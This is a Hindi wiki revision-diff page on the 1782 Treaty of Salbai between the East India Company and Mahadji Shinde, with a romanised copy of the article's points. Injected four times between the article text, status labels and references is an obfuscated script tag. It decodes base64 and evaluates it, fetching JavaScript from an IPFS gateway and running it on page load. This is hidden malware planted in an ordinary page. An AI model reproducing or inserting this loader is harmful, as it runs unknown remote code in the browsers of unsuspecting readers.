Difference between revisions of "सालबाई की सन्धि"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "मजबूत" to "मज़बूत")
Line 1: Line 1:
*'''सालबाई की सन्धि''', मई 1782 ई. में [[ईस्ट इण्डिया कम्पनी]] और [[महादजी शिन्दे]] के बीच हुई थी।
+
*'''सालबाई की सन्धि''', [[मई]] 1782 ई. में [[ईस्ट इण्डिया कम्पनी]] और [[महादजी शिन्दे]] के बीच हुई थी।
*फ़रवरी 1783 ई. में [[पेशवा]] की सरकार ने इसकी पुष्टि कर दी थी।
+
*[[फ़रवरी]] 1783 ई. में [[पेशवा]] की सरकार ने इसकी पुष्टि कर दी थी।
*इसके फलस्वरूप 1775 ई. से चला आ रहा प्रथम [[मराठा]] युद्ध समाप्त हो गया।
+
*इसके फलस्वरूप 1775 ई. से चला आ रहा [[मराठा युद्ध|प्रथम मराठा युद्ध]] समाप्त हो गया।
*सन्धि की शर्तों के अनुसार [[साष्टी]] टापू [[अंग्रेज़|अंग्रेज़ों]] के अधिकार में ही रहा।
+
*सन्धि की शर्तों के अनुसार [[साष्टी|साष्टी टापू]] [[अंग्रेज़|अंग्रेज़ों]] के अधिकार में ही रहा।
 
*अंग्रेज़ों ने [[राघोवा]] का पक्ष लेना छोड़ दिया और मराठा सरकार ने इसे पेंशन देना स्वीकार कर लिया।
 
*अंग्रेज़ों ने [[राघोवा]] का पक्ष लेना छोड़ दिया और मराठा सरकार ने इसे पेंशन देना स्वीकार कर लिया।
 
*अंग्रेज़ों ने [[माधवराव नारायण]] को [[पेशवा]] मान लिया और [[यमुना नदी]] के पश्चिम का समस्त भू-भाग महादजी शिन्दे को लौटा दिया।
 
*अंग्रेज़ों ने [[माधवराव नारायण]] को [[पेशवा]] मान लिया और [[यमुना नदी]] के पश्चिम का समस्त भू-भाग महादजी शिन्दे को लौटा दिया।
*अंग्रेज़ों और मराठों में यह सन्धि 20 वर्षों तक शान्तिपूर्वक चलती रही।
+
*अंग्रेज़ों और मराठों में यह सन्धि 20 [[वर्ष|वर्षों]] तक शान्तिपूर्वक चलती रही।
 
*इस सन्धि से सर्वाधिक लाभ अंग्रेज़ों को ही प्राप्त हुआ; क्योंकि अब उन्हें [[टीपू सुल्तान]] जैसे अन्य शत्रुओं से निश्चिन्तता पूर्वक निपटने तथा अपनी शक्ति और स्थिति को और भी मज़बूत करने का अवसर मिल गया।
 
*इस सन्धि से सर्वाधिक लाभ अंग्रेज़ों को ही प्राप्त हुआ; क्योंकि अब उन्हें [[टीपू सुल्तान]] जैसे अन्य शत्रुओं से निश्चिन्तता पूर्वक निपटने तथा अपनी शक्ति और स्थिति को और भी मज़बूत करने का अवसर मिल गया।
  

Revision as of 06:26, 21 April 2012

  • salabaee ki sandhi, mee 1782 ee. mean eest indiya kampani aur mahadaji shinde ke bich huee thi.
  • faravari 1783 ee. mean peshava ki sarakar ne isaki pushti kar di thi.
  • isake phalasvaroop 1775 ee. se chala a raha pratham maratha yuddh samapt ho gaya.
  • sandhi ki shartoan ke anusar sashti tapoo aangrezoan ke adhikar mean hi raha.
  • aangrezoan ne raghova ka paksh lena chho d diya aur maratha sarakar ne ise peanshan dena svikar kar liya.
  • aangrezoan ne madhavarav narayan ko peshava man liya aur yamuna nadi ke pashchim ka samast bhoo-bhag mahadaji shinde ko lauta diya.
  • aangrezoan aur marathoan mean yah sandhi 20 varshoan tak shantipoorvak chalati rahi.
  • is sandhi se sarvadhik labh aangrezoan ko hi prapt hua; kyoanki ab unhean tipoo sultan jaise any shatruoan se nishchintata poorvak nipatane tatha apani shakti aur sthiti ko aur bhi mazaboot karane ka avasar mil gaya.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bhattachary, sachchidanand bharatiy itihas kosh, dvitiy sanskaran-1989 (hindi), bharat diskavari pustakalay: uttar pradesh hindi sansthan, 469.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>